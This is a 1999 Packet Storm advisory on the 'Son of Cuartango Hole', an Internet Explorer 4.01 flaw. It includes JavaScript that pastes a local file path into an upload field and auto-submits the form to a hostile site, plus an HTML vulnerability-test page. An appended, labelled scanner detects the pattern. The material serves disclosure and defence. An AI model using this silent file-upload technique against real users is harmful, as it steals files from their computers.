cuartango-son.txt

17 Aug 1999 00:00:00 | Reported by Packet Storm | Type: packetstorm | packetstormsecurity.com

Cuartango Hole exploits untrusted scripted paste in Internet Explorer; fix available from Microsoft.

`The Son of Cuartango Hole   
  
http://pages.whowhere.com/computers/cuartangojc/son1.html  
  
Affected software  
Microsoft Internet Explorer 4.01  
  
Fixes  
Microsoft has released a fix : Microsoft Security Site   
http://www.microsoft.com/security/bulletins/ms98-015.asp  
Microsoft names the vulnerability as "Untrusted Scripted Paste".   
They have created a new USP patch.  
  
Technical description  
  
There is an input form field used to transfer files from the browsing computer to a web site. This  
input field is HTML coded as :  
  
<input type="file" name="filename" size="30">  
  
Theoretically this input field can be filled only by the user by clicking a "Browse" button or  
typing the file name.  
In order to avoid a security hole, scripts are not allowed to modify the value of this  
input field; the statement below will not work :  
  
document.forms[0].filename.value = "C:\\config.sys";  
  
The Cuartango Hole revealed that a single scripted "copy and paste" operation could write a file  
name into the input field. Microsoft's old USP patch fixed this single "copy and paste"  
vulnerability.  
There is a workaround that makes the "paste" operation work again. The idea is : create a "textrange"  
object from the selection of the file input and then paste over this "textrange" object.   
  
The code below is a bit more sophisticated than the "Cuartango Hole" code :  
  
T1 is a hidden input field defined in a second form containing the file pathname to be copied to  
the clipboard.  
  
  
<body onload="getfile()">  
  
function getfile()  
{  
document.forms[1].T1.select();  
document.execCommand("copy");  
document.forms[0].filename.select();  
var rng = document.selection.createRange();  
rng.execCommand("paste");  
document.forms[0].submit();  
}  
  
The result is that the file is POSTed to the malicious web site defined in the form action  
property.  
Similar code will also work inside an HTML-formatted e-mail.   
  
The Cuartango Hole code was very similar :  
  
function getfile()  
{  
document.forms[1].T1.select();  
document.execCommand("copy");  
document.forms[0].filename.select();  
document.execCommand("paste");  
document.forms[0].submit();  
}  
  
  
  
Example Exploit  
  
<html>  
  
<head>  
<meta name="keywords"  
content="son of cuartango hole,cuartango hole,cuartango hack,cuartango,security,security site,USP,USP patch,security web,hack,security,risk,hole,security hole,explorer">  
<title>Son of Cuartango Hole Test</title>  
<bgsound src="images/gallarda.mid" loop="-1">  
</head>  
  
<body onload="getfile()">  
<script language="JavaScript">  
  
function getfile()  
{  
document.forms[0].filename.select(); // onload="getfile()"  
var rng = document.selection.createRange();  
document.forms[1].T1.select();  
document.execCommand("copy");  
rng.execCommand("paste");  
if(document.forms[0].filename.value == "")  
alert("Your browser does not have the security hole");  
else  
alert("Security hole in browser -- " + navigator.userAgent );  
}  
  
</script>  
  
  
<p align="center"><big><font color="#FF0000"><big><big>The Son of Cuartango Hole Test</big></big></font></big><small></p>  
</small>  
  
<p align="center">&nbsp;</p>  
<small>  
  
<form enctype="multipart/form-data" method="post"  
action="http://www.angelfire.com/cgi-bin/bedit">  
<div align="center"><center><p><strong>This is a test to verify if you are affected by the  
Son of Cuartango Hole</strong>.<br>  
<strong>If file name (/test.txt) is made visible in the box below then you are effected.</strong></p>  
</center></div><div align="center"><center><p>&nbsp;<input type="file" name="filename"  
size="15"></p>  
</center></div>  
</form>  
  
<form method="POST">  
<input type="hidden" name="T1" value="/test.txt"><p>&nbsp;</p>  
</form>  
</small>  
  
<p align="center"><font size="3" color="#0000FF"><a  
  
href="http://pages.whowhere.com/computers/cuartangojc/son1.html"><strong>Back to Son Of  
Cuartango Hole page</strong></a></font></p>  
  
<p align="center">&nbsp;&nbsp;&nbsp; <a href="mailto:[email protected]">Juan  
Carlos García Cuartango</a></p>  
  
<p align="center"><font face="Arial"><img src="/cgi-bin/Count.cgi" width="97" height="24"><small><br>  
</small></font></p>  
  
<p><font size="2" face="Garamond">Last update&nbsp;1998&nbsp; Nov 15 Año del Señor de  
1998 </font></p>  
</body>  
</html>  
`
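From the defender's side, the pattern the advisory describes (a file upload field that script pastes into, directly or through a TextRange) can be flagged statically in a web page or HTML e-mail body. The following is an added example, not code from the advisory or from Microsoft's patch; the function name, verdict labels and sample strings are assumptions constructed for illustration.

```javascript
// Added example: heuristic regex scan (not an HTML parser) for scripted paste
// into a file upload field. Names, labels and samples are constructed.
const FILE_INPUT = /<input\b[^>]*\btype\s*=\s*["']?file\b[^>]*>/gi;
const NAME_ATTR = /\bname\s*=\s*["']?([\w.-]+)/i;
const SCRIPTED = {
  copy: /\.execCommand\s*\(\s*["']copy["']/i,
  paste: /\.execCommand\s*\(\s*["']paste["']/i,
  textRange: /\.selection\s*\.\s*createRange\s*\(/i,
  autoSubmit: /\.submit\s*\(\s*\)/i,
};

function scanForScriptedPaste(html) {
  const fileInputs = (html.match(FILE_INPUT) || []).map((tag) => {
    const m = NAME_ATTR.exec(tag);
    return m ? m[1] : "(unnamed)";
  });
  const hits = {};
  for (const [key, re] of Object.entries(SCRIPTED)) hits[key] = re.test(html);
  // A file input that script pastes into is the core of both holes;
  // createRange() marks the variant that got past the first USP patch.
  let verdict = "clean";
  if (fileInputs.length > 0 && hits.paste) {
    verdict = hits.textRange ? "scripted-paste-textrange" : "scripted-paste";
  } else if (fileInputs.length > 0 && hits.autoSubmit) {
    verdict = "review"; // upload form submitted by script, no paste seen
  }
  return { fileInputs, ...hits, verdict };
}

// Constructed samples mirroring the advisory's snippets (not captured traffic).
const FORM = '<form method="post"><input type="file" name="filename" size="30"></form>';
const SAMPLES = {
  textRange: FORM + '<script>document.forms[0].filename.select();' +
    'var rng = document.selection.createRange(); rng.execCommand("paste");</script>',
  direct: FORM + '<script>document.forms[0].filename.select();' +
    'document.execCommand("paste");</script>',
  benign: FORM + '<p>Choose a file and press Upload.</p>',
};

for (const [name, html] of Object.entries(SAMPLES)) {
  console.log(name, JSON.stringify(scanForScriptedPaste(html)));
}
```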
